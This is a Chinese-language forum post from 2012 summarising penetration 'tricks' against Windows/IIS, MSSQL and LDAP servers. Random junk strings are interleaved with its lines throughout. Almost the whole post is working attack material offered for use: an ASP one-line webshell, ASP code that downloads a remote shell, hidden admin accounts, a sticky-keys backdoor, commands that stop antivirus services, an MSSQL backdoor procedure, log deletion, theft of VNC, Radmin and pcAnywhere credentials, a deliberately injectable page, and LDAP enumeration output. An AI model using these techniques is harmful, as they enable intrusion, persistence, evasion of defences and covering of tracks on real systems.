中国网络渗透测试联盟
标题:
渗透技巧总结
[打印本页]
作者:
admin
时间:
2012-9-5 15:00
标题:
渗透技巧总结
旁站路径问题
- i7 k+ z+ w! ^0 p, M
1、读网站配置。
3 r' Q4 X- i9 D: n$ x0 s% T g
2、用以下VBS
* Q1 k4 H7 \% N4 f9 e* H
On Error Resume Next
& x$ c1 B& A* u8 C6 r: B( t# j
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
$ }( |: M$ q+ f
+ ^2 J2 \1 O* Y# Z, J
1 K' r z" U; ^1 p( }
Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "
) Z/ o3 s6 Y) X" Q4 D
6 v+ i/ Z% A+ w% {& J- |: Q
Usage:Cscript vWeb.vbs",4096,"Lilo"
7 W7 I* K3 q" w* j/ ^2 y
WScript.Quit
% O) v9 u" H1 u: R; D; J, \0 A/ J
End If
& Q" M! p, u0 q
Set ObjService=GetObject
, e0 |2 l: b( _( O* m- @6 \. f3 P, L
. N* I) u% T9 x
("IIS://LocalHost/W3SVC")
C, k0 v' z J- v9 q* d7 n5 I* ^
For Each obj3w In objservice
% k9 ?, }& o! i
If IsNumeric(obj3w.Name)
4 X# m0 i, d3 d/ k6 a) b! r
8 |( W; B% F4 `- E, V, D2 \
Then
! p6 V; B. h' V& I+ U
Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
: n1 H" @- q( b7 L
; l2 g0 k4 G7 v0 d! E" P
% n! ?0 u3 l |: A" y$ c
Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
/ |" Z# @, z/ [5 r
If Err
9 ~ W2 o* Q$ u7 n9 t: Z
& o2 S# m( }3 x9 Q, q; t
<> 0 Then WScript.Quit (1)
) M! I9 _7 M1 v! \" S! D# G: ?
WScript.Echo Chr(10) & "[" &
0 A9 M# P6 c1 S
. c4 x" {+ _$ f
OService.ServerComment & "]"
1 W, J" @6 [ T+ [* x
For Each Binds In OService.ServerBindings
z" ]) E0 l- L- i8 N* |0 f
' a# \8 ? J5 i( m
& x4 o5 u( K' V9 j" W( {
Web = "{ " & Replace(Binds,":"," } { ") & " }"
: L" z1 ]; w* ^
- L4 f% ^8 y; f8 J7 I
; t+ h/ B" F1 x& ^
WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
7 l6 l% J+ S7 Y9 [: o
Next
9 e% w# p& A4 q
/ o7 B' T6 i1 H* b1 Y" W( C
; p6 Y# x7 |! H3 V8 L1 a+ F
WScript.Echo "
ath : " & VDirObj.Path
: e" v" B; `, Q$ a0 h. P$ A0 Q" {
End If
! \8 ]# j- R1 _" U. p2 v8 L2 A# c' P) {
Next
0 ]4 t! H- W8 G2 \; u5 D9 j
复制代码
& P0 r; W6 T8 S! Z. F3 M) k8 k
3、iis_spy列举(注:需要支持ASPX,反IISSPY的方法:将activeds.dll,activeds.tlb降权)
. q" ]; `$ R& ~) d5 Y" V! \
4、得到目标站目录,不能直接跨的。通过echo ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp 像目标目录写入webshell。或者还可以试试type命令.
( T' F4 _$ d; V" C/ Q+ B- M+ n
—————————————————————
& K: D. a; r# v2 g5 i
WordPress的平台,爆绝对路径的方法是:
) [) G; g# q$ ?! z5 |
url/wp-content/plugins/akismet/akismet.php
: ?( u2 k2 n2 E5 G, s) D/ U* S
url/wp-content/plugins/akismet/hello.php
9 V& { S+ v$ A* l& E
——————————————————————
2 [1 Y% x2 a; r/ Q0 Z6 u$ b* d* y
phpMyAdmin暴路径办法:
3 K: [1 K" ~& P* M) _/ x
phpMyAdmin/libraries/select_lang.lib.php
$ @4 H, w# b0 e: z, Z
phpMyAdmin/darkblue_orange/layout.inc.php
' f! c1 Q6 `2 m& s
phpMyAdmin/index.php?lang[]=1
, C; ^2 k7 V3 x4 M
phpmyadmin/themes/darkblue_orange/layout.inc.php
4 F" k- l2 B- l; q# B0 Z$ W
————————————————————
3 S% Z! e3 t' L. @3 m
网站可能目录(注:一般是虚拟主机类)
8 v. _5 ]% M) c' B% R' K# ]5 e
data/htdocs.网站/网站/
1 M3 y, ~/ ]9 A" e7 i7 z5 b
————————————————————
4 s: }" u7 Y& D& ], z! v; x, D
CMD下操作VPN相关
" o0 L) I' ?, ]& B. h9 @* X+ v
netsh ras set user administrator permit #允许administrator拨入该VPN
9 ^# {* h6 \2 q& F4 W
netsh ras set user administrator deny #禁止administrator拨入该VPN
' G4 f/ S1 V8 U* a- t8 g
netsh ras show user #查看哪些用户可以拨入VPN
. q; {# }. ~1 D, V8 Z
netsh ras ip show config #查看VPN分配IP的方式
; ~4 a' j4 [- _: O Q
netsh ras ip set addrassign method = pool #使用地址池的方式分配IP
) O1 L2 H$ W$ ~9 K2 t# V
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
5 p/ G; i9 U+ d6 i7 h8 r( x, {
————————————————————
J2 C* B; s# t8 V" \
命令行下添加SQL用户的方法
$ r7 l$ ~8 ^7 \& {6 b
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
- Y- W- {/ b+ \) @
exec master.dbo.sp_addlogin test,123
@1 T5 k6 k5 A1 z/ P
EXEC sp_addsrvrolemember 'test, 'sysadmin'
. e2 o* X2 [( I( o
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
4 x5 {7 s$ s0 \8 l6 I& n
' L! D: b& ?* b
另类的加用户方法
( U# @- n Q6 }8 u' g
在删掉了net.exe和不用adsi之外,新的加用户的方法。代码如下:
$ Z$ [2 Q2 n# s* s# |! s
js:
) C7 g0 a; E% o3 g& d! [! L9 Y, l/ {
var o=new ActiveXObject( "Shell.Users" );
$ n8 G- f) O& d+ A) `# n/ I2 p
z=o.create("test") ;
5 L' T& \9 \( g# Q1 N4 ]
z.changePassword("123456","")
7 C' }9 E' E9 m. _$ `3 J
z.setting("AccountType")=3;
! g4 M/ U4 e9 L4 e' `6 F4 {# q
6 g! _2 n" n. t9 A3 e$ |. U
vbs:
5 G* _1 v5 E: v; m0 T/ v1 \* w
Set o=CreateObject( "Shell.Users" )
. F. Q' l; L8 c. w x
Set z=o.create("test")
( n4 I7 h& \! S8 d3 o+ L! N, H
z.changePassword "123456",""
" h6 i a, t4 H+ I: V3 w
z.setting("AccountType")=3
T2 H! g" b0 q; P
——————————————————
8 m1 X% Y; [" X! ~7 o. z
cmd访问控制权限控制(注:反everyone不可读,工具-文件夹选项-使用简单的共享去掉即可)
+ ^' x, S% t" S! e* h
% r& T, U, I7 f
命令如下
7 f' x$ D8 T, e1 |6 H
cacls c: /e /t /g everyone:F #c盘everyone权限
& v3 \: R! ~1 i3 s$ v+ Q J$ \
cacls "目录" /d everyone #everyone不可读,包括admin
: q1 y! u1 [1 m0 ]% Y- a) S
————————以下配合PR更好————
! E7 t q6 E0 O: l- G3 z
3389相关
5 J' ~ l' m5 e$ }) l
a、防火墙TCP/IP筛选.(关闭net stop policyagent & net stop sharedaccess)
: s# A0 ?+ B) U. Z/ y4 R* l1 [2 g
b、内网环境(LCX)
. m0 t" i3 o# Q
c、终端服务器超出了最大允许连接
* n, r' T% j I9 ` A$ O
XP 运行mstsc /admin
* j E/ {. ?! k$ W
2003 运行mstsc /console
/ M- \7 y) z2 M3 S
8 z! s3 [) S1 g' ] ~
杀软关闭(把杀软所在的文件的所有权限去掉)
' b' w! t) D- n9 k b
处理变态诺顿企业版:
& g- t) c) _% z8 d3 R$ j
net stop "Symantec AntiVirus" /y
; o0 a/ ?7 ~6 \1 m* Z, g" Y: }
net stop "Symantec AntiVirus Definition Watcher" /y
; s: S, W2 R( h. i) r. a
net stop "Symantec Event Manager" /y
3 g7 c. s- h6 m0 ^/ a0 B
net stop "System Event Notification" /y
) C# Z8 |4 t( z7 M& B
net stop "Symantec Settings Manager" /y
! E: M+ u ^0 P: y
% M# m2 a8 w2 c' L1 B B) l) ~# m
卖咖啡:net stop "McAfee McShield"
1 W# S1 U! W1 h+ ?
————————————————————
^( E8 S8 h; c! \
8 m$ l- V' g- ]0 J
5次SHIFT:
# ^; \# a0 j' @# O- h! i+ M
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
- X5 C% {7 O/ K0 B% o
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
! f" f" Q, M9 r
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
( v* i4 k3 Q; c+ o5 Y
——————————————————————
9 H. S' _( H/ L1 @" Z( P- g& i
隐藏账号添加:
) B- p$ V, I! a, G) j
1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
/ } F9 T b v5 x2 {, t8 d! ]
2、导出注册表SAM下用户的两个键值
& Z5 c% ^2 r. [- h- ]: N
3、在用户管理界面里的admin$删除,然后把备份的注册表导回去。
6 b1 R2 I2 e* `) i6 R( C
4、利用Hacker Defender把相关用户注册表隐藏
) e' H) D" l/ U" q4 T& [( j
——————————————————————
8 |6 c! H3 ^$ U r; N6 D
MSSQL扩展后门:
) a; E% j2 U# N) H9 Z
USE master;
. W+ e1 D" `3 ]5 V% O* U
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
# c# Z2 {' C. y8 y" Q
GRANT exec On xp_helpsystem TO public;
, s6 a H, T7 u9 D0 k
———————————————————————
1 Q4 B W$ c+ m$ {# F3 f8 |$ y
日志处理
) g% c; f6 Y4 h$ B& f( c
C:\WINNT\system32\LogFiles\MSFTPSVC1>下有
$ Y: @2 @" K& c; q1 O" J. u: ^% I
ex011120.log / ex011121.log / ex011124.log三个文件,
, G/ ~1 ?/ s, w/ v" j4 U
直接删除 ex0111124.log
0 i1 H+ _+ F6 T C" d! I
不成功,“原文件...正在使用”
& w6 i5 \( d3 H( ^6 H
当然可以直接删除ex011120.log / ex011121.log
& b& l( t9 W3 I2 I' H+ Y0 E x
用记事本打开ex0111124.log,删除里面的一些内容后,保存,覆盖退出,成功。
, Y' F8 N- H* K, j
当停止msftpsvc服务后可直接删除ex011124.log
& [( O$ r1 H% w/ [# c
! A V, L/ h' a6 M: P- s
MSSQL查询分析器连接记录清除:
; f; Y; U# x% H( Y% J) h
MSSQL 2000位于注册表如下:
1 d$ M- t8 Z2 `/ }
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
3 Q7 O) J, f/ ?. I
找到接接过的信息删除。
3 e7 m, _3 K7 T2 Z4 m& `
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL
3 |8 }( x0 n) n( s
. ]. u% K7 U. h! W$ Q
Server\90\Tools\Shell\mru.dat
, M/ ~/ q j9 D
—————————————————————————
/ L8 r* ^2 k5 _2 Q* P' U: ?- t$ k: ~
防BT系统拦截可使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,用服务器安全工具一扫通通挂掉了)
4 G- z" s! Z4 Z; C" P+ y
$ _% O0 m( S: Y; w9 q+ h. @2 [
<%
2 Q" m. D# f6 I
Sub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
$ n# g2 R; H2 l3 X6 E: v7 K. Y0 E' v
Dim Ads, Retrieval, GetRemoteData
- }- A% z5 D! t* o T* E
On Error Resume Next
* |, D6 j& ~" X+ o/ U: y G6 P
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
* \: S6 j; a7 X
With Retrieval
. T! h; u% U' a" i5 w8 @9 k! Q
.Open "Get", s_RemoteFileUrl, False, "", ""
$ E) m6 a/ Q: S9 _" A
.Send
- c+ `1 E6 V4 B* h3 a, o9 q# Z
GetRemoteData = .ResponseBody
* `; n, p Z* j" w" L0 U
End With
" q7 ]' m" ^8 N2 t
Set Retrieval = Nothing
. p5 z e, \% S' t2 m, d3 c
Set Ads = Server.CreateObject("Adodb.Stream")
0 O6 k/ ^) c* D! U
With Ads
5 b8 g, k2 I# U7 V+ N& z
.Type = 1
3 G' E- c9 n: i
.Open
2 D6 @% ^9 {3 i' I5 x1 K! S" P
.Write GetRemoteData
9 J+ L8 r5 a3 \/ L+ u! i
.SaveToFile Server.MapPath(s_LocalFileName), 2
8 a, m, u# v8 E- Y$ K. h) x
.Cancel()
% ^+ r2 u2 [* f* H' [4 k
.Close()
4 C. J0 C0 v2 N
End With
+ O C' X+ Q# ^" t) D9 Z
Set Ads=nothing
0 ]2 v7 i/ k3 [8 Y6 H8 O0 O; ^
End Sub
" q" m5 ?& |9 Y. C' l$ G- }7 i
. E& h ~5 P, W, X
eWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
$ ^3 n2 C8 l+ ?7 X3 p
%>
6 C6 _1 T% @$ r7 G
6 Q; N8 r$ z3 B7 J, V( D+ A8 X
VNC提权方法:
' ^ b( U) v5 S& L
利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解
* r9 _% O/ M R" v, j6 z0 }
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
5 D. [8 e( p7 x( [
regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
6 H8 c' R* L% g0 {' ^- N2 e X- o
regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
! `9 }, v7 Z( B: A
Radmin 默认端口是4899,
- H- A: W0 b- F- m* n
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
2 k2 h: Q& \* h, r6 J
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
+ V5 A5 U9 ^$ w- ^, s$ j) V
然后用HASH版连接。
# ^7 m% v& ? y" E; j6 j: ~; d, ` }
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过PCANYWHERE从本机登陆服务器。
5 ]; h2 i9 Y( P/ H
保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下,那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
4 @' h. s0 p' Y' a, U" i/ [
Users\Application Data\Symantec\pcAnywhere\文件夹下。
1 \5 f2 s, ^+ w. q) o f: Y; F8 b
——————————————————————
$ n( c0 G; T- v) Y, m6 t
搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
9 P/ {9 H) g7 y
——————————————————----------
$ o; c K% Y. R l9 o
WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式下下
& o' _/ a- g8 g% d; ~2 U
来,看路径,访问 路径\web传shell,访问shell后,权限是system,放远控进启动项,等待下次重启。
S; g! k ]. g' s
没有删cmd组建的直接加用户。
2 s$ e% V. e4 H& F1 J
7i24的web目录也是可写,权限为administrator。
9 K1 E' N* \7 h8 `8 |
) n. d9 H. g q) X7 ^) @: L
1433 SA点构建注入点。
5 x# \. M+ r: K3 q1 }
<%
+ ~7 f/ B4 {$ o6 d, G* d
strSQLServerName = "服务器ip"
* f2 Z3 R9 ~" j) A% D$ t3 J
strSQLDBUserName = "数据库帐号"
9 B! f4 B" @! g# A
strSQLDBPassword = "数据库密码"
. r& u6 ]+ f1 S# b' ~2 j
strSQLDBName = "数据库名称"
- V" a6 _& O5 f9 H
Set conn = Server.createObject("ADODB.Connection")
2 z' |! R" K; J
strCon = "
rovider=SQLOLEDB.1
ersist Security Info=False;Server=" & strSQLServerName &
, ~9 M# b& P. q) d, Z
8 V/ g8 C5 W8 `% f$ M q3 `5 h- U
";User ID=" & strSQLDBUserName & "
assword=" & strSQLDBPassword & ";Database=" &
3 \: }1 @% Q: {
% ]3 V/ v: F! D6 ~$ t
strSQLDBName & ";"
( r2 I1 n4 g4 ]6 f' k
conn.open strCon
/ Z# j2 j6 _$ S' I. Z% F5 @8 Z" w
dim rs,strSQL,id
9 T, {( s' A: h X7 y/ [
set rs=server.createobject("ADODB.recordset")
4 u% q& k* y5 A9 \( {' z
id = request("id")
' ]& z4 b7 J! \
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
2 T* Q; V& ?! T% q! d) Q6 d U7 }% @
rs.close
& g" n$ L; n7 m# o: E9 ~
%>
/ j7 ~6 g. h# b7 Q- Y
复制代码
6 W6 s6 ?+ H, V \7 J% }6 A) K$ {% m
******liunx 相关******
0 E6 K; } Y+ y, P; b$ D( t% Y
一.ldap渗透技巧
$ j$ n/ V/ _5 [/ v/ P* k9 L
1.cat /etc/nsswitch
& K: |' y# ~; b: U' ]$ `
看看密码登录策略我们可以看到使用了file ldap模式
N' ?( J( p' h0 r. g7 g/ a+ ]# R, h
% X" G0 z1 E' H. @" c
2.less /etc/ldap.conf
+ n7 [) G3 o' m: x/ Z
base ou=People,dc=unix-center,dc=net
* ~ d' Q! ^/ Z% h! l
找到ou,dc,dc设置
4 F/ n9 ^1 e. A% S; S7 y% @
5 _/ ]* p- U+ B% s/ f2 e
3.查找管理员信息
# Y" W' d9 e+ C( m
匿名方式
) u/ z& L0 N& M# q6 _1 M
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
8 r2 H- U' ^/ D! i2 h/ U6 q' A1 @
; F+ {. C) s* l8 q0 {
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
1 ]1 h5 w* a" g( l
有密码形式
7 L9 O" L5 |7 |% W' q. ~8 N! \
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
* i) F) H' M. F2 I% O9 s z7 `
5 h6 w; t5 g- b
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
* `9 Q: U" L8 g0 t9 W
+ I! b* ?3 ^: R5 E! ]! ?
; o& m& U! H' m0 H# E
4.查找10条用户记录
& y6 r" R. s* Q" d7 ], N- h
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
4 g% {3 N; O4 d2 Z, m! a5 L
/ M w5 `( u' x) c
实战:
- L% ]2 @& c% d) u: e
1.cat /etc/nsswitch
9 v' L# S8 S2 Y1 n% p7 ]( u' k# ]$ {
看看密码登录策略我们可以看到使用了file ldap模式
3 ]+ e, K9 x/ r3 q, p" @" @
- d/ G }: l7 l% R
2.less /etc/ldap.conf
2 u- M. M; I* Q
base ou=People,dc=unix-center,dc=net
4 m! o" X% F5 A- F( d" ^
找到ou,dc,dc设置
4 |: M/ R' t$ P' u: z& _
* f( ]# A) ]1 i5 F4 z
3.查找管理员信息
3 k8 W- p% n6 c# \, F
匿名方式
- F7 W2 b' c. y* z5 H5 m* d3 q
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
! y( y8 e$ y1 h0 v* V8 }
. \; Z8 ^8 }! v2 t- ?) {# M
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
& x, O2 G# k5 V, T1 r; F
有密码形式
. e9 Q& U! S' M
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
! H* o* x% l$ p u4 [- E: e4 v4 e
5 @3 K$ C4 ?( s" ?
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
% L- n+ _ W2 p% h0 S0 R
2 {$ m, \0 H7 c) _( C8 A! x
5 v% d0 }5 T, ?' _0 V+ P
4.查找10条用户记录
/ ^! X& A1 F2 Q! C h
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
: C' ^3 }! [$ E' Y: _/ X
8 W: n+ {" U5 @6 F' z
渗透实战:
) M! y, b7 \5 ?9 y
1.返回所有的属性
' |! N& e8 F% n7 t
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
, J3 J3 W7 y" E
version: 1
0 M3 x* j; q; t. j
dn: dc=ruc,dc=edu,dc=cn
, b6 h3 q5 O8 f$ P) l5 d
dc: ruc
/ _) O; i/ G$ F% ]
objectClass: domain
+ @1 M! C+ v- ^
2 Y& C+ y& Z# v8 |# `5 L
dn: uid=manager,dc=ruc,dc=edu,dc=cn
$ N4 R. i5 c+ Q/ h8 ~1 z
uid: manager
1 d$ f0 n' {# f2 G9 F4 n
objectClass: inetOrgPerson
9 W& h* z3 b* z& K$ k8 D) w: ?
objectClass: organizationalPerson
" R- ?6 J4 v t1 g
objectClass: person
" n- p$ g. i: J1 z* v
objectClass: top
1 ~. f) X- H4 d3 W
sn: manager
, N, ~( e/ r' m! Y$ t5 C8 _
cn: manager
0 i5 d& }# y6 D! `8 o
% I' w6 J2 t- V6 ], T
dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
! {5 K X, z5 w: F, U
uid: superadmin
m: Y& X7 W/ d6 _
objectClass: inetOrgPerson
5 w, i* u8 \) `! O0 T0 P
objectClass: organizationalPerson
# c; v D. e! m8 \5 ]$ I
objectClass: person
! v+ g/ o, r% X
objectClass: top
6 v# V0 O w( L5 m# k6 G# ^
sn: superadmin
8 B* y' g" K. d- `, D
cn: superadmin
6 t: B8 |, a# k7 U
+ k' @0 q" t- {* \) M1 c \
dn: uid=admin,dc=ruc,dc=edu,dc=cn
5 |1 G1 C( N5 X
uid: admin
% X- ^; q6 |: K% o) Y/ k
objectClass: inetOrgPerson
# A# b; Q w; }, v, J
objectClass: organizationalPerson
7 T8 w C3 D: w1 {( B* Z9 J; [
objectClass: person
( P1 M3 Z2 u; d3 X
objectClass: top
, Z3 p& f7 H; {1 q% d/ Z- ]
sn: admin
) ~4 J# y( p* c4 q2 O
cn: admin
d8 @2 s9 Y8 F q* t! A" o
1 p: o8 {' s2 N! K, L
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
; e: t" E* R7 B; j8 j- f6 c+ k
uid: dcp_anonymous
! e- @- y# a5 f
objectClass: top
# K& K0 A1 K; ?
objectClass: person
/ N' C4 u! s- }! B1 N' d" D
objectClass: organizationalPerson
# ^7 ], \* g6 j
objectClass: inetOrgPerson
. |' f7 ~% x V" C# J9 I3 E
sn: dcp_anonymous
' q0 R' p; n/ q; B+ `: R# ^8 C
cn: dcp_anonymous
U6 _; c1 T! \- h2 l ~
% w! f, J1 p- ~
2.查看基类
/ `. [8 ^* _0 p
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |
% B7 J) `& N* X/ j! }
! U9 Z; i& I' W8 @/ }9 _
more
6 V) Y2 [4 Z( B3 j: I8 ?# o( \
version: 1
- ?0 Y8 l9 K' \, G$ H k
dn: dc=ruc,dc=edu,dc=cn
k u3 }5 A w
dc: ruc
# n, S2 t' V2 |3 I6 T/ G
objectClass: domain
& d! F, z7 H( |& h7 K( w) q( K
) q- ]) n, E! N B( H1 Z/ t0 ^+ g
3.查找
1 J" Y" }( S( y* ]9 g) K" h, x
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
% S' r5 C( I+ M! g. Q
version: 1
; t7 T" f. z" Q( o; _
dn:
7 a% S% h# d. R4 k$ i+ c' p( n
objectClass: top
, S5 w7 N9 T; P' L ]5 O3 S
namingContexts: dc=ruc,dc=edu,dc=cn
! Q) j4 e" N. g3 O+ f
supportedExtension: 2.16.840.1.113730.3.5.7
3 C D: p* x; K! R: l2 x
supportedExtension: 2.16.840.1.113730.3.5.8
: j8 E+ X0 M" O/ U2 e6 r6 r* g4 X
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
7 ?1 W* _/ c8 n
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
* U! C! C$ f. v' @0 n+ H
supportedExtension: 2.16.840.1.113730.3.5.3
7 T6 q$ E( Z8 Y6 t2 ^) |
supportedExtension: 2.16.840.1.113730.3.5.5
; r% p- L5 |( `& P5 J* F8 v
supportedExtension: 2.16.840.1.113730.3.5.6
% X) F. I# X3 `7 K& ]
supportedExtension: 2.16.840.1.113730.3.5.4
+ j% y0 Y6 ?' |8 C* H
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
. B: h. _% W& u; o# n/ w
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
* y+ m/ l* L2 V! [5 h
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
h, K, p3 S1 }- n. t% {6 l
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
5 ?* E$ g9 |, j9 [7 \' x8 e' j8 O
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
9 w+ f0 B9 r- J
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
/ _7 |# p2 O7 Z3 W6 ]& ~
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
3 x K: p( x, _6 ~
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
6 g9 n6 R: p T0 i3 t! k# b
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
) ]1 Z- t Z" h
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
- w* z9 E# x: U! J9 v9 ^
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
; y3 d4 L" M4 l$ j( x
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
, a8 g6 y! b. |2 W+ W: K
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
* I9 i' ^& P' K
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
3 o g8 R' B# o$ {
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
* [& K& {) c& ]9 `- W+ t0 v/ [
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
9 S f1 t# V4 u! @9 Z( H2 n
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
$ B2 i' \6 |$ o+ f/ s5 V0 E9 H- e
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
}/ P' R2 a3 E
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
3 t6 B! p1 O0 B; q. K
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
+ m4 j* m& _& R. A( A, _
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
/ b7 y- a9 E8 J/ P
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
/ y5 \# s8 S2 H, S- q
supportedExtension: 1.3.6.1.4.1.1466.20037
# p, ^7 m x0 v. @
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
0 P, t1 x3 U% d6 D$ k' J0 N
supportedControl: 2.16.840.1.113730.3.4.2
/ p1 Q5 [7 x) |) k q9 K
supportedControl: 2.16.840.1.113730.3.4.3
8 _: O+ s F1 o$ C
supportedControl: 2.16.840.1.113730.3.4.4
# l! t2 ]: j/ ^
supportedControl: 2.16.840.1.113730.3.4.5
8 s/ ?0 L1 U0 r. V0 F9 S6 ?
supportedControl: 1.2.840.113556.1.4.473
! ?5 ], L0 X" \, l5 m t0 r5 ~- ]) V
supportedControl: 2.16.840.1.113730.3.4.9
! ^; W7 `* v- c8 }6 I) h
supportedControl: 2.16.840.1.113730.3.4.16
# D, n' e3 I6 R. ]4 R1 H- x \
supportedControl: 2.16.840.1.113730.3.4.15
8 n9 X$ D# G$ h' [
supportedControl: 2.16.840.1.113730.3.4.17
2 V J6 t2 K* K
supportedControl: 2.16.840.1.113730.3.4.19
$ u3 {, a! O! e1 `+ I& _
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
! D7 @; [7 r) F2 I
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
; L0 S5 Z& L8 f& y/ H$ ?# W" C
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
& K; \# l: l8 [" p/ \2 g9 m
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
, z% M/ H3 A' H9 @8 x6 J( ^ D
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
5 _! z z- ^6 U6 a
supportedControl: 2.16.840.1.113730.3.4.14
G. H. `) ]: R3 D
supportedControl: 1.3.6.1.4.1.1466.29539.12
, ]# H8 l1 t6 T3 X6 w
supportedControl: 2.16.840.1.113730.3.4.12
1 t& ~* G$ j$ M; {
supportedControl: 2.16.840.1.113730.3.4.18
# N$ i) r0 b$ x4 s1 U" b0 X. T
supportedControl: 2.16.840.1.113730.3.4.13
, p& ]- K9 u3 f# b- P* l
supportedSASLMechanisms: EXTERNAL
* U! D2 ^4 Z- T
supportedSASLMechanisms: DIGEST-MD5
9 }( b' d/ y/ ^* f4 }; ~4 r
supportedLDAPVersion: 2
/ }+ n) w+ A( k$ ?% Q2 w
supportedLDAPVersion: 3
( N! L8 o) q. I8 q
vendorName: Sun Microsystems, Inc.
) \9 a# _; Y2 D, ~4 W
vendorVersion: Sun-Java(tm)-System-Directory/6.2
) \4 n9 E* Q3 @7 r$ \& O/ d
dataversion: 020090516011411
6 E: e* b" O4 D+ d" w" g
netscapemdsuffix: cn=ldap://dc=webA:389
* ^/ ?; D9 Z+ I3 P" f% k
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
, I# }6 B7 {, q8 _* }0 I
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
, f$ z1 B l0 v: G3 F) \, z( }
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
2 } |) D! U4 s/ O
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
/ W$ _; i9 D, _ u- E! \8 e
